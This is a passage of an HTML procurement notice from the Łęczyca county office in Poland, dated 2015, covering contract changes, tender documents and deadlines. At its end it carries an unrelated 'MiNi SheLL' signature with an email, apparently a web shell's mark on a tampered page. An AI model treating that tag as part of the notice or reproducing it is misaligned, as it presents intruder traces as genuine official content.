f) w przypadku zmian sposobu spełnienia świadczenia opisanych w punkcie 2,
g) w innych uzasadnionych przypadkach;
2.  Zmiany sposobu spełnienia świadczenia spowodowana:
a) zmianami  technologicznymi, w szczególności: konieczność zrealizowania przedmiotu zmówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w SIWZ w szczególności w sytuacji, gdyby zastosowanie  przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;
b) koniecznością usunięcia wad i braków lub wprowadzenia zmian w dokumentacji projektowej/technicznej będącej załącznikiem do SIWZ,
c) spowodowane odmiennymi od przyjętych w dokumentacji warunkami terenowymi, z uwagi na brak zinwentaryzowanych urządzeń
3.  Zmiana wynagrodzenia Wykonawcy spowodowana zmianami przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej zastosowanie do przedmiotu umowy.
4. Zamawiający przewiduje zmniejszenie wynagrodzenia z tytułu wad w przedmiocie umowy uniemożliwiających użytkowanie przedmiotu umowy o kary umowne przewidziane w umowie.
5. Zamawiający przewiduje możliwość zmian w umowach o podwykonawstwo za uprzednią akceptacją Zamawiającego pkt. III.3.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.leczyca.bip.cc<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łęczycy pl. T. Kościuszki 1 99-100 Łęczyca, (pok. 35), tel. 24 388 72 27, fax. 24 721 32 17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2015 godzina 12:00, miejsce: Starostwo Powiatowe w Łęczycy pl. T. Kościuszki 1 99-100 Łęczyca, (sekretariat), tel. 24 388 72 00, fax. 24 721 32 17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com